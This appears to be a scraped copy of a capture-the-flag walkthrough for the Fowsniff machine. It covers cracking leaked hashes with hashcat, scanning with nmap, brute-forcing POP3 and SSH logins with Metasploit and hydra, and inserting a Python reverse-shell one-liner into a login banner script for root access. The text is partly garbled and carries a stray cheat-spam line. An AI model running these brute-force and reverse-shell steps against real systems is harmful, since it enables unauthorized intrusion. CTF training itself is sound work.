Welcome!

About the Game:
CTF’s walkthrough will show you how to… | by Hani Anis Bouzid | Medium
Reconnaissance is an important step in the application assessment process and it almost always an easy win, whether it’s discovering more attack surfaces or obtaining critical data with minimal…
Reconnaissance. Reconnaissance is an important step in the application assessment process and it almost always an easy win, whether it’s discovering more attack surfaces or obtaining critical data with minimal complications. First view.

Click Here for Lifeline whiteout Hack

I prefer to open the IP in a browser to get a first look at the victim. If it doesn’t open, it means the target isn’t a website or it doesn’t use the default ports for http. In either case, we’ll run a scan with nmap later. The website appears to be out of service due to a data breach which exposed employees’ usernames and passwords, as well as their Twitter account being hacked. Fowsniff Corp website is out of service. After doing some research on Twitter, I discovered the company’s official Twitter account. According to tweets, the site administrator is maybe stone@fowsniff. The hackers shared a dumped list of passwords at pastebin.com. Hackers deployed a link containing the usernames and passwords of employees. Twitter , where hackers mock the company by asking if the hash is for the sysadmin. Download files Download the dumped file with the following command, or just copy it and paste it somewhere on your local computer. Download dumped file with wget. Make a list of users Before we begin cracking, we’ll filter our file to obtain a list of usernames and hashes from the dumped data. make a list of username. Make list of passwords Now filter your file so that only hashes remain. With the following command, you can see the password being cracked while the process is running. hashcat -m0 -a 0 /path/to/dictionary/MyDictionary.txt. You can also crack hashes by searching for them on Google or by doing it in hash killer website. Start cracking hashes with hashcat. hashcat -m0 –show -o. Cracked Hash. Gather More Information with nmap. To gain time and productivity, you can run nmap while hashcat cracks the hashes. To check for open ports and services, run the following command. nmap -sT -sV -n -F -vv -oN ports.lst Once we’ve identified the open ports and the services that run on them, we can continue our scan to look for detailed version numbers on each service running on each port, so we can experiment with different Metasploit auxiliary modules to find potential exploits. nmap scanning result. Gaining Access. Metasploit. We must seek out valid credentials by using Metasploit “Perhaps an employee who hasn’t changed his password yet”. Tape msfconsol in your terminal to run metasploit. Use the search command to search for the pop3 module. Tap the appropriate index number or full path to module to select scanner/pop3/pop3_login. MetaSploit. Tape show option to see what option is available for /pop3_login. Now set the appropriate options for the module, including the username and password list, as well as the host IP target, then run. msf6 auxiliary( scanner/pop3/pop3_login ) > set rhost msf6 auxiliary( scanner/pop3/pop3_login ) > set USER_FILE user.txt msf6 auxiliary( scanner/pop3/pop3_login ) > set PASS_FILE password.txt msf6 auxiliary( scanner/pop3/pop3_login ) > run. We have a valid login . MetaSploit running pop3_login scanner module. Connect to this employee mail server via telnet using that valid login, commands are listed below. telnet USER PASS STAT #return Number of messages in the queue and total size in bytes LIST # list of waiting messages RETR # print email DELE # delete email RSET # Cancels all destruction commands during the session. QUIT. After logging in, I looked through the victim’s email list and discovered that the system administrator had sent out an email to all employees in which he gave them instructions and created a default login and password for them to use on an ssh server. Use RETR 1 to print on screen the first email . After getting the ssh password from that email, I assumed that the first user had not yet changed his password and was using the default password, but this was not the case, so I had to use hydra to brutforce ssh using the default password with my dumped user list. Tape the command below to test the password with hydra. hydra -L user.txt -p ” -t numberOFThreads ssh. hydra testing password. ssh to Fowsniff shell. To be honest, I struggled a little bit to figure out why to escalate the privilege there were so many files to check, but in the end, I did after running search command that I’ll show you later. I found a script displays a banner that is identical to the one displayed during ssh login, to verify I used the grep command to search in etc folder for file configuration which uses that script, then exploited this bad configuration to my favor. Run this command groups to see what group the user belongs to, then search for files which the user can execute using the find command with those arguments: find -group – and -perm. find command. The script below displays the same ssh login banner. cube script. According to the 00-header file in the /etc/update-motd.d folder, when a user connects to the machine through SSH, the /opt/cube/cube.sh file is called so we can edit the banner to run an malicious code. Add this line to cube.sh file. python3 -c ‘import socket,subprocess,os,s=socket.socket(socket.AF_INET,socket.SOCK_STREAM),s.connect((,)),os.dup2(s.fileno(),0), os.dup2(s.fileno(),1), os.dup2(s.fileno(),2),p=subprocess.call([/bin/sh”,”-i”]),’ editing cube.sh file. Set up a listener on our local machine. Now restart your ssh session.